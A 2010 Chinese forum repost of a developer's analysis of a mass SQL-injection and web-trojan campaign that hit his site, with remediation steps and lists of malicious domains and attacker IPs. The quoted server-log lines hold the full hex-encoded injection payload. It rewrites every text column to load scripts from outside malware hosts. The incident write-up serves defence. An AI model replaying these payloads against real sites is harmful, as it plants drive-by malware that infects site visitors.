【原创】针对近期网站注入挂马猖獗的分析
程序生涯的一大杯具,发生在2010年1月28日。自己开发的一个网站被挂马,导致数据库数据全部被篡改,数据都被添加了如下代码<script src=http://a.ll8cc.cn></script><!--
(防止不懂的人误点击。我把冒号换成了全角状态下的冒号了)
一切现象很明显,程序被注入了,悔不该…………
当时由于开发时间仓促,在处理传递参数过滤代码时发现和程序里某个模块不兼容,当时太大意。就直接把过滤参数代码屏蔽了,结果导致了这么大的杯具。
数据修复完毕,就得着手考虑解决方案了。
搜了下a.ll8cc这个东西,不得了。被挂马的网页不再少数。
google搜索:
搜索 a.ll8cc.cn 获得约 294,000 条结果,以下是第 1-10 条。 (用时 0.10 秒)
大部分页面都是直接被挂马而没有发现,仍在运行中。
找到了一份权威部门的分析报告,数据惊人。
大家要提防这些域名:
重点域名:- 8884.ss.la -xiey.3322.org-a.ppmmoo.cn- a.ll8cc.cn-a.mmzfc.cn-sesesemml.cn - a.0772sw.cn - mm.aa88567.cn- wgwggg.cn-z360.net-65gd.cn- sdf454gdf.3322.org
不完全统计,有上百家ZF或者官方的网站都深受其害,所以分析是一次有规模,有组织的挂马活动。
详细的挂马分析在这篇日志里:http://www.ximenyifan.com/article/450.htm
虽然本人不是对网络安全非常懂吗,但是既然被注入了,我就得搞清楚原因。
所以查看服务器日志找到了可疑之处:
服务器日志:
view.aspxid=0c7ef9f4-3b38-41ae-b1b2-3c4006688f39&cybname=haiyuexiang;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f612e6c6c3863632e636e3e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20eXeC(@s)--80-210.51.44.164 Mozilla/4.0 500 0 64
view.aspxid=0c7ef9f4-3b38-41ae-b1b2-3c4006688f39&cybname=haiyuexiang';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f612e6c6c3863632e636e3e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20eXeC(@s)--80-210.51.44.164 Mozilla/4.0 500 0 64
view.aspxid=0c7ef9f4-3b38-41ae-b1b2-3c4006688f39&cybname=haiyuexiang;dEcLaRe/**/@s/**/vArChAr(8000)/**/sEt/**/@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f612e6c6c3863632e636e3e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52/**/eXeC(@s)--80-210.51.44.164 Mozilla/4.0 500 0 64
肯定是通过这个注入的链接导致数据库被篡改。但是具体注入的手法和原理尚不明确。
顺藤摸瓜,注入来源直指210.51.44.164这个IP,
随即bd之,发现此IP是 上海市 漕河泾网通IDC机房。
具体这个服务器是不是被控制这个尚不知晓,但是从bd的搜索中我又找到了一些有说服力的证据。
搜索引擎提示找到了如下内容。http://jxgdb.com/ex091201.log
这是这个网站的日志,真怀疑这网站为何把自己的日志放在了根目录下。
很明显这个网站也是被挂马了,我把他的日志down下来分析后发现确实是来自同一IP的攻击。
部分日志:
display.aspxkeyid=n000027013;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b2727223e3c2f7469746c653e3c736372697074207372633d687474703a2f2f7767776767672e636e3a312f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20eXeC(@s)--80-210.51.44.164 HTTP/1.1 Mozilla/4.0 - - www.jxty.gov.cn 200 0 012684 1222 187
display.aspxkeyid=n000027013';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b2727223e3c2f7469746c653e3c736372697074207372633d687474703a2f2f7767776767672e636e3a312f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20eXeC(@s)--80-210.51.44.164 HTTP/1.1 Mozilla/4.0 - - www.jxty.gov.cn 200 0 012685 1223 187
注入的手法原理几乎一样,IP都一样,但是他这个网站很明显被注入了多次。
我简略统计了一下攻击注入此站点的IP如下。
219.238.148.6 (北京市)
210.51.44.164 (上海市 漕河泾网通IDC机房)
211.152.56.182(上海市 )
124.42.121.81 (北京市 光环新网)
自己也不是安全专家,所以只能查到这一步了。
剩下的就是解决问题了。sql注入还算是个不是太神秘的东西,把自己的程序加上了传递参数的过滤。
还有就是对数据库权限进行设置,从网上找的一段代码:
1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
看其他的网友说,站点2天被注入了多次,怀疑注入方是程序注入,循环扫描。
所以最后推荐大家把以上说的几个IP在站点权限中设置成为拒绝访问。
估计还有其他的主机也在进行着同样的活动,如果大家还发现类型的IP从事注入活动,请大家去我的blog留言,我会时刻整理更新。
留言地址:http://www.ximenyifan.com/article/451.htm
大家如果被多次注入攻击,请大家去上面的地址获取主机IP列表,在站点设置中设置为拒绝访问。
本文首发西门逸凡的Blog,转载请注明出处。
[ 本帖最后由 西门轩辕 于 2010-1-28 15:58 编辑 ] 支持..
页:
[1]